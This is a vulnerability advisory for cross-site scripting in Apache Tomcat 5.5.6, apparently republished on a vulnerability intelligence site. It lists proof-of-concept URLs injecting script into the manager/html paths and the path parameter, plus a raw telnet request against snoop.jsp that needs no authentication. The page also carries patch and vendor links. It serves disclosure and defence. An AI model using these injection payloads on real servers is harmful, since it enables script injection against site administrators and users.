Lucene search
jakarta556_xss.txt
Apache Tomcat has Cross Site Scripting vulnerabilities on version 5.5.6 affecting multiple platforms.
Show more
`Apache Jakarta Tomcat Cross Site Scripting Vulnerabilities
===========================================================
Version
========
Apache Tomcat/5.5.6 running on Windows 2000
(Other platforms may also be affected)
Exploiting
===========
http://192.168.0.23:8080/manager/html/<script>alert("Hallo")</script>
http://192.168.0.23:8080/manager/html/stop?path=<script>alert("Hallo")</script>
http://192.168.0.23:8080/manager/html/start?path=<script>alert("Hallo")</script>
Second one works without authentication, but should not be that easy to
exploit:
Telnet to port 8080 and paste the following:
<script>alert("Hallo")</script> /jsp-examples/snp/snoop.jsp HTTP/1.0
Vendor
======
http://jakarta.apache.org
Patch
=====
http://www.mail-archive.com/[email protected]/msg66978.html
Discovered
==========
03.Jan.2005
oliver karow
http://www.oliverkarow.de/research/jakarta556_xss.txt`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo07 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4